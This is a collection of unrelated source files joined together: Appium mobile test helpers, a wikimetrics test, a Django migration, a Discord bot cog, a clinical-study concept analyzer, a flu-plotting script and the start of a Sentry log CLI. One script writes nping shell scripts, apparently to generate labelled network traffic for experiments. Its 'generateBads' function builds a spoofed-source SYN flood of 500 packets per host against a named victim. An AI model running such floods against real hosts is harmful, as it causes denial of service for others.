for i in range(n):
logging.info("第%d次滑屏" % i)
time.sleep(3)
self.driver.swipe(x1, y1, x2, y1)
class Action:
'''操作手机通知栏/获取元素'''
def __init__(self, driver):
self.driver = driver
self.action = TouchAction(self.driver)
def get_element(self, locator):
"""
通过传入的locator获取selenium webelement对象
:param locator:
:return:
"""
locator_type = locator[0]
element = None
if locator_type == By.ID:
element = findId(self.driver, locator[1])
logging.debug("使用 id 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.XPATH:
element = findXpath(self.driver, locator[1])
logging.debug("使用 xpath 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.LINK_TEXT:
element = findLinkText(self.driver, locator[1])
logging.debug("使用 link text 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.PARTIAL_LINK_TEXT:
element = findPLinkText(self.driver, locator[1])
logging.debug("使用 partial link text 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.NAME:
element = findName(self.driver, locator[1])
logging.debug("使用 name 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.TAG_NAME:
element = findTagName(self.driver, locator[1])
logging.debug("使用 tag name 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.CLASS_NAME:
element = findClassName(self.driver, locator[1])
logging.debug("使用 class name 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.CSS_SELECTOR:
element = findCss(self.driver, locator[1])
logging.debug("使用 css selector 定位元素 ==> {0}".format(locator[1]))
else:
logging.error("错误的locator_type,请确认")
return element
def get_elements(self, locator):
"""
通过传入的locator获取selenium webelements对象
:param locator:
:return:
"""
locator_type = locator[0]
elements = None
if locator_type == By.ID:
elements = findsId(self.driver, locator[1])
logging.debug("使用 id 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.XPATH:
elements = findsXpath(self.driver, locator[1])
logging.debug("使用 xpath 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.LINK_TEXT:
elements = findsLinkText(self.driver, locator[1])
logging.debug("使用 link text 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.PARTIAL_LINK_TEXT:
elements = findsPLinkText(self.driver, locator[1])
logging.debug("使用 partial link text 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.NAME:
elements = findsName(self.driver, locator[1])
logging.debug("使用 name 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.TAG_NAME:
elements = findsTagName(self.driver, locator[1])
logging.debug("使用 tag name 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.CLASS_NAME:
elements = findsClassName(self.driver, locator[1])
logging.debug("使用 class name 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.CSS_SELECTOR:
elements = findsCss(self.driver, locator[1])
logging.debug("使用 css selector 定位元素 ==> {0}".format(locator[1]))
else:
logging.error("错误的locator_type,请确认")
return elements
def set_touch_pwd(self, locator):
'''
设置手势解锁
:param locator: 获取第一个触摸点的坐标location及size
:return:
'''
start = self.get_element(locator)
start_height = start.size['height'] #
start_width = start.size['width']
start_x = start.location['x']
start_y = start.location['y']
begin_x = start_x + start_width / 2
begin_y = start_y + start_height / 2
action = TouchAction(self.driver)
action.press(x=start_x, y=start_y).wait(100).move_to(x=start_x + start_width * 2, y=begin_y).wait(100).\
move_to(x=start_x + start_width * 2, y=start_y + start_height * 2).wait(100).\
move_to(x=begin_x, y=start_y + start_height * 2).release().perform()
def adjust_volume(self, size):
'''调节系统音量,变大或变小'''
def adjust_brightness(self, size):
'''调节屏幕亮度,变大或变小'''
def clean_notification_bar_message(self):
'''清空通知栏消息'''
self.driver.open_notifications() # 打开下拉通知栏
def open_close_wifi(self):
'''打开/关闭Wi-Fi'''
def airplane_mode(self):
'''打开飞行模式'''
class KeyEvent:
'''按键事件'''
def __init__(self, driver):
self.driver = driver
def volume(self, size:int) -> None:
'''按键系统音量变大或变小'''
if size >=0:
for i in range(0, size):
self.driver.press_keycode(KEYCODE.KEYCODE_VOLUME_UP) # 音量大键
else:
for i in range(size, 0):
self.driver.press_keycode(KEYCODE.KEYCODE_VOLUME_DOWN) # 音量小键
self.driver.press_keycode(KEYCODE.KEYCODE_BACK) # 返回键
class AssertBase:
'''断言相关'''
def __init__(self, driver):
self.driver = driver
@cb.com_try_catch
def check_current_activity(self, app_activity):
'''验证当前activity是否登录传入app_activity'''
current_activity = self.driver.current_activity
if current_activity:
cb.checkEqual(current_activity, app_activity)
else:
logging.error('当前没有app_activity')
class BasePage(Swipe, Action, KeyEvent, AssertBase):
'''其他通过方法'''
def __init__(self, driver):
self.driver = driver
super().__init__(driver=self.driver)
@cb.com_try_catch
def install_app(self, app_path:str, app_package:str):
'''
:param app_path: 安装包路径
:param app_package: 安装包包名
:return: 先判断是否安装: 如果未安装,则执行安装
'''
if self.driver.is_app_installed(app_package):
logging.info(f'{app_package}已安装')
else:
self.driver.install_app(app_path)
logging.info(f'{app_package}安装成功')
@cb.com_try_catch
def uninstall_app(self, app_package:str):
'''
:param app_package: 安装包包名
:return: 先判断是否安装: 如果已安装,执行卸载
'''
if self.driver.is_app_installed(app_package):
self.driver.remove_app(app_package)
logging.info(f'{app_package}卸载成功')
else:
logging.info(f'{app_package}已卸载')
@cb.com_try_catch
def open_app(self, app_package:str, app_activity:str) -> None:
'''
:param app_package: 需要打开的应用名
:param app_activity: 需要打开的界面
:return: 在当前应用中打开一个activity或者启动一个新应用并打开一个 activity
'''
logging.info(f'当前activity: {self.driver.current_activity}')
self.driver.start_activity(app_package, app_activity)
logging.info(f'当前activity: {self.driver.current_activity}')
def app_strings(self):
'''返回应用程序的字符串'''
string = self.driver.app_strings(language='en')
return string
@cb.com_try_catch
def get_app_package_info(self):
"""
:return: 输出短信程序包名和界面名
"""
return [self.driver.current_package, self.driver.current_activity]
@cb.com_try_catch
def get_window_info(self):
'''获取屏幕宽度和高度'''
size = self.driver.get_window_size()
width = size['width']
height = size['height']
return [width, height]
def lock_app(self):
'''锁定屏幕'''
self.driver.lock(5)
def hide_keyboard(self):
'''收起键盘'''
self.driver.hide_keyboard()
def shake_app(self):
'''模拟设备摇晃'''
self.driver.shake()
def current_content(self):
'''进入指定上下文'''
current_content = self.driver.current_context # 列出当前上下文
current_contents = self.driver.contents # 列出所有的可用上下文
return current_content
@cb.com_try_catch
def backgroup_app(self, seconds:int, restart=True):
'''backgroup app seconds'''
if restart == True:
self.driver.background_app(seconds)
else:
pass
@cb.com_try_catch
def wait(self, fun, timeout=10, fre=1):
'''
:param : 显示等待
:return:
'''
wait = WebDriverWait(self.driver, timeout, fre)
wait.until(fun)
@cb.com_try_catch
def click_element(self, locator, is_button=True):
"""
点击
:param locator:
:param is_button:
:return:
"""
element = self.get_element(locator)
if is_button:
element.click()
else:
element = self.get_element(locator)
TouchAction(self.driver).tap(element).perform()
@cb.com_try_catch
def set_text(self, locator, values):
"""
为输入框 输入字符内容
:param locator:
:param values:
:return:
"""
text_field = self.get_element(locator)
text_field.clear()
text_field.send_keys(values)
def clean_app_cash(self,app_package):
'''清除app缓存'''
def is_displayed(self, locator, mark=True):
"""
判断某个元素是否存在
:param locator:
:return:
"""
element = self.get_element(locator)
if mark:
self.hight_light(element)
return element.is_displayed()
def hight_light(self, element, times=2, seconds=2, color="red", border=2):
"""
传入selenium webelement对象如果能找到就高亮显示
:param element:
:param times:
:param seconds:
:return:
"""
js = "element = arguments[0]; " \
"original_style = element.getAttribute('style'); " \
"element.setAttribute('style', original_style + \";" \
"border: %spx solid %s;\");" \
"setTimeout(function(){element.setAttribute('style', original_style);}, 1000);" %(border,color)
try:
for i in range(0, times):
self.driver.execute_script(js, element)
except Exception as e:
logging.error(e)
def switch_h5_app(self, context):
self.driver.execute(MobileCommand.SWITCH_TO_CONTEXT, {"name": context})
def find_item(self, el):
'''验证页面元素是否存在'''
logging.info(f'验证页面元素:{el} 是否存在')
source = self.driver.page_source
if el in source:
return True
else:
return False
| 12,619 | 4,573 |
import celery
from nose.tools import assert_equal, assert_true
from datetime import datetime
from wikimetrics.models import TaskErrorStore, ReportStore
from ..fixtures import DatabaseTest
class TaskErrorStoreTest(DatabaseTest):
def setUp(self):
DatabaseTest.setUp(self)
self.report = ReportStore(status=celery.states.PENDING)
self.session.add(self.report)
self.session.commit()
def test_add_new(self):
# If the failing report has no previous errors,
# a new task error should be created.
t1 = datetime.now().replace(microsecond=0)
TaskErrorStore.add('report', self.report.id, 'message', 'traceback')
t2 = datetime.now().replace(microsecond=0)
row = self.session.query(TaskErrorStore).first()
assert_equal(row.task_type, 'report')
assert_equal(row.task_id, self.report.id)
assert_true(row.timestamp >= t1 and row.timestamp <= t2)
assert_equal(row.message, 'message')
assert_equal(row.traceback, 'traceback')
assert_equal(row.count, 1)
def test_add_existing(self):
# If the failing report has previous errors,
# the existing task error should be updated.
t1 = datetime.now()
te = TaskErrorStore(task_type='report', task_id=self.report.id, count=1,
timestamp=t1, message='message', traceback='traceback')
self.session.add(te)
self.session.commit()
TaskErrorStore.add('report', self.report.id, 'message2', 'traceback2')
t2 = datetime.now()
row = self.session.query(TaskErrorStore).first()
print t1, row.timestamp, t2
assert_equal(row.task_type, 'report')
assert_equal(row.task_id, self.report.id)
assert_true(row.timestamp > t1 and row.timestamp < t2)
assert_equal(row.message, 'message2')
assert_equal(row.traceback, 'traceback2')
assert_equal(row.count, 2)
| 1,957 | 587 |
# Generated by Django 2.0 on 2017-12-20 04:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('puzzles', '0003_auto_20171219_2002'),
]
operations = [
migrations.AddField(
model_name='metapuzzle',
name='description',
field=models.TextField(default='What technology should I use to build my spoooooky website? Originally written for Coding Dojo students in October 2017.'),
preserve_default=False,
),
]
| 545 | 180 |
from discord.ext import commands
class Testing(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def who(self, ctx):
author = ctx.author
await ctx.send(f"Hello {author}")
@commands.command()
async def debug_free_cash(self, ctx):
author = ctx.author
if str(ctx.author) != "TestUser#0001":
raise ValueError("Unauthorized API usage")
await ctx.send("You are not authorized to do that")
else:
await ctx.insert_into_inventory(author, "money", 1000)
await ctx.send("You have been given $1000!")
@commands.command()
async def debug_clear(self, ctx):
author = ctx.author
if str(ctx.author) != "TestUser#0001":
raise ValueError("Unauthorized API usage")
await ctx.send("You are not authorized to do that!")
else:
await ctx.clear_inventory(author)
| 958 | 294 |
import random
def generateRandomIndex(inputlist):
'''(list of str)->str'''
return random.choice(inputlist)
def readHostFile(fileToPen):
'''(str)->list of str'''
lines=open(fileToPen,'r')
line=lines.readlines()
listOfHost=[]
for i in line:
listOfHost.append(i.strip())
s = set(listOfHost)
return list(s)
def generateBads(hostsFile, victim):
output = open('attack_'+victim+'.sh', 'w')
output.write("#!/bin/bash\n\n")
hostsList=readHostFile(hostsFile)
for hs in hostsList:
scriptLine= 'nping --tcp -S ' + hs + ' -p 80 --flags syn ' + victim + ' -c 500 --delay 20ms &\n'
output.write(scriptLine)
output.close()
def generateScripts(server,host):
serversList=readHostFile(server)
hostsList=readHostFile(host)
random.shuffle(serversList)
serversList = serversList[:7]
uniqueList = set(serversList)
uniqueList.add('93.184.220.20')
uniqueList.add('65.54.189.53')
uniqueList.add('82.199.80.141')
serversList = list(uniqueList)
goodsTraffic = []
for hs in hostsList:
# sname = hs.split('.')[-1] + ".sh"
# starter.write( "./{0} &\n".format(sname) )
# output = open(sname, 'w')
# output.write("#!/bin/bash\n")
# output.write("sleep " + str(random.uniform(0.5, 1)) + "\n" )
# generate random traffic for a given host
for i in range(30):
serverName = generateRandomIndex(serversList)
scriptLine= 'nping --tcp -S ' + hs + ' -p 80 --flags syn ' + serverName + ' -c 1\n'
goodsTraffic.append(scriptLine)
#output.write(scriptLine)
#output.write("sleep 1\n")
#output.close()
starter = open('start_goods.sh', 'w')
starter.write("#!/bin/bash\n\n")
random.shuffle(goodsTraffic)
trafficQty = len(goodsTraffic)
numberOfScripts = 10
avgTrafficPerScript = trafficQty/numberOfScripts
for i in range(numberOfScripts):
sname = str(i)+'.sh'
command = './{0} &\n'.format(sname)
starter.write(command)
output = open(sname, 'w')
output.write("#!/bin/bash\n\n")
begin = i*avgTrafficPerScript
end = begin + avgTrafficPerScript
lines = goodsTraffic[begin:end]
output.writelines(lines)
output.close()
#lines = "\n".join(goodsTraffic)
#starter.write(lines)
starter.close()
#run
generateScripts('input.txt','hosts.txt')
#generateBads('bad_hosts.txt', 'it.fxfeeds.mozilla.com')
| 2,577 | 950 |
__title__ = 'base'
__author__ = 'Gloryness'
__license__ = 'MIT License'
| 73 | 32 |
import ontotextapi as onto
import utils
import json
from os.path import isfile, join, split
import joblib as jl
import cohortanalysis as cohort
from ann_post_rules import AnnRuleExecutor
import sys
import xml.etree.ElementTree as ET
import concept_mapping
import urllib3
import logging
class StudyConcept(object):
def __init__(self, name, terms, umls_instance=None):
self.terms = terms
self._name = name
self._term_to_concept = None
self._concept_closure = None
self._umls_instance = umls_instance
def gen_concept_closure(self, term_concepts=None, concept_to_closure=None):
"""
generate concept closures for all terms
:param term_concepts: optional - expert verified mappings can be used
:param concept_to_closure: precomputed concept to closure dictionary
:return:
"""
self._term_to_concept = {}
self._concept_closure = set()
if term_concepts is None:
term_concepts = {}
for term in self.terms:
concept_objs = onto.match_term_to_concept(term if not term.startswith("~~") else term[2:])
if concept_objs is not None:
term_concepts[term] = [o['localName'] for o in concept_objs]
for term in term_concepts:
candidate_terms = []
for concept in term_concepts[term]:
if concept_to_closure is not None:
candidate_terms.append((concept, concept_to_closure[concept]))
else:
candidate_terms.append((concept, onto.get_transitive_subconcepts(concept)))
# pick the rich sub-concept mappings
if len(candidate_terms) > 1:
candidate_terms = sorted(candidate_terms, key=lambda x: -len(x[1]))
if term.startswith('~~'):
to_remove = set(candidate_terms[0][1])
to_remove.add(candidate_terms[0][0])
self._concept_closure -= to_remove
print 'removed %s items' % len(to_remove)
else:
self._concept_closure.add(candidate_terms[0][0])
self._concept_closure |= set(candidate_terms[0][1])
self._term_to_concept[term] = {'mapped': candidate_terms[0][0], 'closure': len(candidate_terms[0][1])}
@staticmethod
def compute_all_concept_closure(all_concepts, umls_instance, skip_relations={}):
concept_to_closure = {}
print 'all concepts number %s' % len(all_concepts)
computed = []
results =[]
utils.multi_thread_tasking(all_concepts, 40, StudyConcept.do_compute_concept_closure,
args=[umls_instance, computed, results, skip_relations])
for r in results:
concept_to_closure[r['concept']] = r['closure']
return concept_to_closure
@staticmethod
def do_compute_concept_closure(concept, umls_instance, computed, results, skip_relations={}):
if concept not in computed:
closure = umls_instance.transitive_narrower(concept, skip_relations=skip_relations)
computed.append(concept)
results.append({'concept': concept, 'closure': closure})
print 'concept: %s transitive children %s' % (concept, closure)
@property
def name(self):
return self._name
@property
def concept_closure(self):
if self._concept_closure is None:
self.gen_concept_closure()
return self._concept_closure
@concept_closure.setter
def concept_closure(self, value):
self._concept_closure = value
@property
def term_to_concept(self):
if self._concept_closure is None:
self.gen_concept_closure()
return self._term_to_concept
@term_to_concept.setter
def term_to_concept(self, value):
self._term_to_concept = value
class StudyAnalyzer(object):
def __init__(self, name):
self._study_name = name
self._study_concepts = []
self._skip_terms = []
self._options = None
@property
def study_name(self):
return self._study_name
@study_name.setter
def study_name(self, value):
self._study_name = value
@property
def study_concepts(self):
return self._study_concepts
@study_concepts.setter
def study_concepts(self, value):
self._study_concepts = value
@property
def skip_terms(self):
return self._skip_terms
@skip_terms.setter
def skip_terms(self, value):
self._skip_terms = value
def add_concept(self, concept):
self.study_concepts.append(concept)
def generate_exclusive_concepts(self):
"""
it is important to have a set of disjoint concepts otherwise concept-document frequencies would
contain double-counted results
:return:
"""
# call the concept closure property to make sure
# that the closure has been generated before
# compute the disjoint
for sc in self.study_concepts:
cc = sc.concept_closure
intersections = {}
explain_inter = {}
for i in range(1, len(self.study_concepts)):
for j in xrange(i):
common = self.study_concepts[i].concept_closure & self.study_concepts[j].concept_closure
if len(common) > 0:
intersections[self.study_concepts[i].name + ' - ' + self.study_concepts[j].name] = common
self.study_concepts[j].concept_closure -= common
explain_inter[self.study_concepts[j].name] = \
['removed %s common (%s) concepts' % (len(common), self.study_concepts[i].name)] \
if self.study_concepts[j].name not in explain_inter \
else explain_inter[self.study_concepts[j].name] + \
['removed %s common (%s) concepts' % (len(common), self.study_concepts[i].name)]
# if len(intersections) > 0:
# print 'intersections [[\n%s\n]]' % json.dumps(explain_inter)
# for sc in self.study_concepts:
# print '%s %s' % (sc.name, len(sc.concept_closure))
def remove_study_concept_by_name(self, concept_name):
for sc in self.study_concepts:
if sc.name == concept_name:
self.study_concepts.remove(sc)
def retain_study_concepts(self, concept_names):
retained = []
for sc in self.study_concepts:
if sc.name in concept_names:
retained.append(sc)
self.study_concepts = retained
def export_mapping_in_json(self):
mapping = {}
for c in self._study_concepts:
mapping[c.name] = c.term_to_concept
def serialise(self, out_file):
print 'iterating concepts to populate the mappings'
for c in self._study_concepts:
tc = c.term_to_concept
print 'saving...'
jl.dump(self, out_file)
print 'serialised to %s' % out_file
@property
def study_options(self):
return self._options
@study_options.setter
def study_options(self, value):
self._options = value
@staticmethod
def deserialise(ser_file):
return jl.load(ser_file)
def gen_study_table(self, cohort_name, out_file):
cohort.populate_patient_study_table(cohort_name, self, out_file)
def gen_sample_docs(self, cohort_name, out_file):
cohort.random_extract_annotated_docs(cohort_name, self, out_file, 10)
def gen_study_table_with_rules(self, cohort_name, out_file, sample_out_file, ruler, ruled_out_file,
sql_config, db_conn_file, text_preprocessing=False):
sql_setting = get_sql_template(sql_config)
cohort.populate_patient_study_table_post_ruled(cohort_name, self, out_file, ruler, 20,
sample_out_file, ruled_out_file,
sql_setting['patients_sql'], sql_setting['term_doc_anns_sql'],
sql_setting['skip_term_sql'],
db_conn_file, text_preprocessing=text_preprocessing)
def gen_study_table_in_one_iteration(self, cohort_name, out_file, sample_out_file,
sql_config, db_conn_file):
sql_setting = get_one_iteration_sql_template(sql_config)
cohort.generate_result_in_one_iteration(cohort_name, self, out_file, 20, sample_out_file,
sql_setting['doc_to_brc_sql'],
sql_setting['brc_sql'],
sql_setting['anns_iter_sql'],
sql_setting['skip_term_sql'],
sql_setting['doc_content_sql'],
db_conn_file)
def gen_study_table_with_rules_es(self, cohort_name, out_file, sample_out_file, ruler, ruled_out_file,
sem_idx_setting_file, retained_patients_filter, filter_obj=None):
cohort.es_populate_patient_study_table_post_ruled(self, out_file, ruler, 20,
sample_out_file, ruled_out_file, sem_idx_setting_file,
retained_patients_filter=retained_patients_filter,
filter_obj=filter_obj)
def get_sql_template(config_file):
root = ET.parse(config_file).getroot()
return {'term_doc_anns_sql': root.find('term_doc_anns_sql').text,
'patients_sql': root.find('patients_sql').text,
'skip_term_sql': root.find('skip_term_sql').text}
def get_one_iteration_sql_template(config_file):
root = ET.parse(config_file).getroot()
return {'doc_to_brc_sql': root.find('doc_to_brc_sql').text,
'brc_sql': root.find('brc_sql').text,
'anns_iter_sql': root.find('anns_iter_sql').text,
'doc_content_sql': root.find('doc_content_sql').text,
'skip_term_sql': root.find('skip_term_sql').text}
def load_ruler(rule_setting_file):
ruler = AnnRuleExecutor()
if rule_setting_file is None:
ruler.load_rule_config('./studies/rules/_default_rule_config.json')
else:
ruler.load_rule_config(rule_setting_file)
return ruler
def load_study_settings(folder, umls_instance,
rule_setting_file=None,
concept_filter_file=None,
do_disjoint_computing=True,
export_study_concept_only=False):
p, fn = split(folder)
if isfile(join(folder, 'study_analyzer.pickle')):
sa = StudyAnalyzer.deserialise(join(folder, 'study_analyzer.pickle'))
else:
sa = StudyAnalyzer(fn)
if isfile(join(folder, 'label2concept.tsv')):
# using tsv file if exists
logging.info('loading study concepts from tsv file...')
lines = utils.read_text_file(join(folder, 'label2concept.tsv'))
scs = []
for l in lines:
arr = l.split('\t')
if len(arr) != 2:
logging.error('line [%s] not parsable' % l)
continue
t = arr[0]
c = arr[1]
sc = StudyConcept(t, [t])
sc.concept_closure = set([c])
tc = {}
tc[t] = {'closure': 1, 'mapped': c}
sc.term_to_concept = tc
scs.append(sc)
logging.debug('study concept [%s]: %s, %s' % (sc.name, sc.term_to_concept, sc.concept_closure))
sa.study_concepts = scs
logging.info('study concepts loaded')
elif isfile(join(folder, 'exact_concepts_mappings.json')):
concept_mappings = utils.load_json_data(join(folder, 'exact_concepts_mappings.json'))
concept_to_closure = None
# concept_to_closure = \
# StudyConcept.compute_all_concept_closure([concept_mappings[t] for t in concept_mappings],
# umls_instance, skip_relations=skip_closure_relations)
scs = []
for t in concept_mappings:
sc = StudyConcept(t, [t])
t_c = {}
t_c[t] = [concept_mappings[t]]
sc.gen_concept_closure(term_concepts=t_c, concept_to_closure=concept_to_closure)
scs.append(sc)
logging.debug(sc.concept_closure)
sa.study_concepts = scs
sa.serialise(join(folder, 'study_analyzer.pickle'))
elif isfile(join(folder, 'manual_mapped_concepts.json')):
mapped_scs = utils.load_json_data(join(folder, 'manual_mapped_concepts.json'))
scs = []
for t in mapped_scs:
sc = StudyConcept(t, [t])
sc.concept_closure = set(mapped_scs[t]['concepts'])
tc = {}
tc[t] = mapped_scs[t]['tc']
sc.term_to_concept = tc
scs.append(sc)
logging.debug('study concept [%s]: %s, %s' % (sc.name, sc.term_to_concept, sc.concept_closure))
sa.study_concepts = scs
else:
concepts = utils.load_json_data(join(folder, 'study_concepts.json'))
if len(concepts) > 0:
scs = []
for name in concepts:
scs.append(StudyConcept(name, concepts[name], umls_instance=umls_instance))
logging.debug('%s, %s' % (name, concepts[name]))
sa.study_concepts = scs
sa.serialise(join(folder, 'study_analyzer.pickle'))
# get filtered concepts only, if filter exists
if concept_filter_file is not None:
logging.debug('before removal, the concept length is: %s' % len(sa.study_concepts))
concept_names = utils.load_json_data(concept_filter_file)
sa.retain_study_concepts(concept_names)
logging.debug('after removal: %s' % len(sa.study_concepts))
# compute disjoint concepts
if do_disjoint_computing:
sa.generate_exclusive_concepts()
if export_study_concept_only:
sc2closure = {}
for sc in sa.study_concepts:
sc2closure[sc.name] = list(sc.concept_closure)
utils.save_json_array(sc2closure, join(folder, 'sc2closure.json'))
logging.debug('sc2closure.json generated in %s' % folder)
if isfile(join(folder, 'study_options.json')):
sa.study_options = utils.load_json_data(join(folder, 'study_options.json'))
merged_mappings = {}
study_concept_list = []
for c in sa.study_concepts:
for t in c.term_to_concept:
all_concepts = list(c.concept_closure)
study_concept_list += all_concepts
if len(all_concepts) > 1:
idx = 0
for cid in all_concepts:
merged_mappings['(%s) %s (%s)' % (c.name, t, idx)] = {'closure': len(all_concepts), 'mapped': cid}
idx += 1
else:
merged_mappings['(%s) %s' % (c.name, t)] = c.term_to_concept[t]
# print c.name, c.term_to_concept, c.concept_closure
# print json.dumps(list(c.concept_closure))
# logging.debug('print merged mappings...')
# print json.dumps(merged_mappings)
# logging.debug(len(study_concept_list))
utils.save_string('\n'.join(study_concept_list), join(folder, 'all_concepts.txt'))
if export_study_concept_only:
return
# sa.gen_study_table(cohort_name, join(folder, 'result.csv'))
# sa.gen_sample_docs(cohort_name, join(folder, 'sample_docs.json'))
ruler = load_ruler(rule_setting_file)
if len(ruler.skip_terms) > 0:
sa.skip_terms = ruler.skip_terms
return {'study_analyzer': sa, 'ruler': ruler}
def study(folder, cohort_name, sql_config_file, db_conn_file, umls_instance,
do_one_iter=False, do_preprocessing=False,
rule_setting_file=None, sem_idx_setting_file=None,
concept_filter_file=None,
retained_patients_filter=None,
filter_obj_setting=None,
do_disjoint_computing=True,
export_study_concept_only=False,
skip_closure_relations={}):
ret = load_study_settings(folder, umls_instance,
rule_setting_file=rule_setting_file,
concept_filter_file=concept_filter_file,
do_disjoint_computing=do_disjoint_computing,
export_study_concept_only=export_study_concept_only)
sa = ret['study_analyzer']
ruler = ret['ruler']
if do_one_iter:
sa.gen_study_table_in_one_iteration(cohort_name, join(folder, 'result.csv'), join(folder, 'sample_docs.json'),
sql_config_file, db_conn_file)
else:
if sem_idx_setting_file is None:
sa.gen_study_table_with_rules(cohort_name, join(folder, 'result.csv'), join(folder, 'sample_docs.js'), ruler,
join(folder, 'ruled_anns.json'), sql_config_file, db_conn_file,
text_preprocessing=do_preprocessing)
else:
filter_obj = None
if filter_obj_setting is not None:
filter_obj = utils.load_json_data(filter_obj_setting)
sa.gen_study_table_with_rules_es(cohort_name, join(folder, 'result.csv'), join(folder, 'sample_docs.js'),
ruler,
join(folder, 'ruled_anns.json'),
sem_idx_setting_file,
retained_patients_filter,
filter_obj=filter_obj)
logging.info('done')
def run_study(folder_path, no_sql_filter=None):
study_config = 'study.json' if no_sql_filter is None else 'study_no_filter.json'
if isfile(join(folder_path, study_config)):
r = utils.load_json_data(join(folder_path, study_config))
retained_patients = None
if 'query_patients_file' in r:
retained_patients = []
lines = utils.read_text_file(r['query_patients_file'])
for l in lines:
arr = l.split('\t')
retained_patients.append(arr[0])
skip_closure_relations = {}
if 'skip_closure_relations' in r:
skip_closure_relations = utils.load_json_data(r['skip_closure_relations'])
study(folder_path, r['cohort'], r['sql_config'], r['db_conn'],
concept_mapping.get_umls_client_inst(r['umls_key']),
do_preprocessing=r['do_preprocessing'],
rule_setting_file=r['rule_setting_file'],
do_one_iter=r['do_one_iter'],
sem_idx_setting_file=None if 'sem_idx_setting_file' not in r else r['sem_idx_setting_file'],
concept_filter_file=None if 'concept_filter_file' not in r else r['concept_filter_file'],
retained_patients_filter=retained_patients,
filter_obj_setting=None if 'filter_obj_setting' not in r else r['filter_obj_setting'],
do_disjoint_computing=True if 'do_disjoint' not in r else r['do_disjoint'],
export_study_concept_only=False if 'export_study_concept' not in r else r['export_study_concept'],
skip_closure_relations=skip_closure_relations
)
else:
logging.error('study.json not found in the folder')
if __name__ == "__main__":
reload(sys)
sys.setdefaultencoding('cp1252')
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if 2 < len(sys.argv) > 3:
print 'the syntax is [python study_analyzer.py STUDY_DIR [-no-sql-filter]]'
else:
run_study(sys.argv[1], no_sql_filter=None if len(sys.argv) == 2 else 'yes')
| 20,282 | 6,303 |
#!/usr/bin/python
##############################################
###Python template
###Author: Elizabeth Lee
###Date: 1/25/15
###Function: time series difference in ILI percentage from CDC-based ILI baseline calculation
###Import data: SQL_export/OR_allweeks_outpatient.csv, anydiag_allweeks_outpatient.csv
###Command Line: python S_deltaILIpercent_time_CDCbaseline_v5.py
##############################################
### notes ###
# Baseline is mean percentage of patient ILI visits during non-flu weeks for the previous 3 seasons plus 2 standard deviations. A non-flu week is a period of 2+ consecutive weeks where flu was <2% of the total number of specimens lab-confirmed for flu. (cdc.gov/flu/weekly/overview.htm)
### packages/modules ###
import csv
import matplotlib.pyplot as plt
## local modules ##
import functions_v5 as fxn
### data structures ###
### functions ###
### data files ###
ILIin = open('/home/elee/Dropbox/Elizabeth_Bansal_Lab/SDI_Data/explore/SQL_export/OR_allweeks_outpatient.csv','r')
ILIfile = csv.reader(ILIin, delimiter=',')
visitin = open('/home/elee/Dropbox/Elizabeth_Bansal_Lab/SDI_Data/explore/SQL_export/anydiag_allweeks_outpatient.csv', 'r')
visitin.readline() # rm header
visitfile = csv.reader(visitin, delimiter=',')
### called/local plotting parameters ###
ps = fxn.pseasons
fw = fxn.gp_fluweeks
sl = fxn.gp_seasonlabels
colvec = fxn.gp_colors
wklab = fxn.gp_weeklabels
fs = 24
fssml = 16
### program ###
# dict_wk[wk] = seasonnum
# dict_ILIpercent[Thu date of week] = ILI as percent of total visits in that week (not a cumulative measure)
# dict_deltaILIpercent53ls[s] = [deltaILI percent wk 40, wk 41, ...wk 39
# dict_refWeek[s] = date of reference week for that season
d_wk, d_ILIpercent = fxn.week_ILIpercent_processing(ILIfile, visitfile)
code = 'cdc'
d_cdcILIpercent53ls = fxn.ILIpercent_processing_CDCbaseline(d_wk, d_ILIpercent)
# plot delta ILI percent time series
for s in ps:
plt.plot(xrange(53), d_cdcILIpercent53ls[s], marker = fxn.gp_marker, color = colvec[s-2], label = sl[s-2], linewidth = fxn.gp_linewidth)
plt.hlines([0], 0, 55, colors='k', linestyles='solid', linewidth=3)
plt.xlim([0, 52])
plt.xticks(range(53)[::5], wklab[::5])
plt.xlabel('Week Number', fontsize=fs)
plt.ylabel('delta ILI perc (ref %s)' % (code), fontsize=fs)
plt.legend(loc='upper right', prop={'size':10})
plt.savefig('/home/elee/Dropbox/Elizabeth_Bansal_Lab/Manuscripts/Age_Severity/fluseverity_figs_v5/exploratory/new_baseline_definition/deltaILIpercent_time_ref%s.png' %(code), transparent=False, bbox_inches='tight', pad_inches=0)
plt.close()
# plt.show()
| 2,603 | 1,009 |
#!/usr/bin/env python
"""Standalone script for Sentry Logs"""
from __future__ import print_function
import os
import argparse
try:
from configparser import ConfigParser
except ImportError: # Python 2.7
from ConfigParser import ConfigParser # pylint: disable=import-error
# Ignore warnings caused by ``sentrylogs.<...>`` imports
# pylint: disable=no-name-in-module
def get_command_line_args():
"""CLI command line arguments handling"""
parser = argparse.ArgumentParser(description='Send logs to Django Sentry.')
parser.add_argument('--sentryconfig', '-c', default=None,
help='A configuration file (.ini, .yaml) of some '
'Sentry integration to extract the Sentry DSN from')
parser.add_argument('--sentrydsn', '-s', default="",
help='The Sentry DSN string (overrides -c)')
parser.add_argument('--daemonize', '-d', default=False,
action='store_const', const=True,
help='Run this script in background')
parser.add_argument('--follow', '-f', default="all",
help='Which logs to follow, default ALL')
parser.add_argument('--nginxerrorpath', '-n', default=None,
help='Nginx error log path')
parser.add_argument('--loglevel', '-l', default=None,
help='Minimum log level to send to sentry')
return parser.parse_args()
def process_arguments(args):
"""Deal with arguments passed on the command line"""
if args.sentryconfig:
print('Parsing DSN from %s' % args.sentryconfig)
os.environ['SENTRY_DSN'] = parse_sentry_configuration(args.sentryconfig)
if args.sentrydsn:
